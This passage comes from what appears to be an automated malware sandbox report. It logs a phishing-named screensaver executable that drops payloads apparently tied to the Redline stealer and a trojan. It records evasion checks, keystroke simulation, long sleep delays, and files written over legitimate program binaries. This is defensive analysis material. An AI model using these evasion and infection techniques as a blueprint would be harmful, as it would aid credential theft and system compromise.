Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004772DE IsWindowVisible, IsWindowEnabled, GetForegroundWindow, IsIconic, IsZoomed
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004375B0 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_004772DE IsWindowVisible, IsWindowEnabled, GetForegroundWindow, IsIconic, IsZoomed
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_004375B0 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Windows\System32\alg.exe | Code function: 9_2_006A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 9_2_006A52A0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00444078 0_2_00444078
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00444078 3_2_00444078
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | API/Special instruction interceptor: Address: 553E234
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | API/Special instruction interceptor: Address: 57B1214
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Memory allocated: 2BE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Memory allocated: 2E20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Memory allocated: 2C40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Memory allocated: 8E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Memory allocated: 1A300000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Memory allocated: 1580000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Memory allocated: 2FF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Memory allocated: 1250000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Memory allocated: 2E90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Memory allocated: 4E90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 1180000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 2A90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 1280000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 2E80000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 3050000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 5050000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 18A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 3130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 5130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Code function: 6_2_00007FF848E84660 sldt word ptr [eax] 6_2_00007FF848E84660
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1200000
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199870
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199765
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199654
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199531
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Window / User API: threadDelayed 3864
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Window / User API: threadDelayed 5890
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Window / User API: threadDelayed 4164
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Window / User API: threadDelayed 5628
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8016
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1593
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Window / User API: threadDelayed 6008
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Window / User API: threadDelayed 3782
                            Source: C:\Windows\System32\msdtc.exe | Window / User API: threadDelayed 487
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                            Source: C:\Windows\SysWOW64\svchost.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
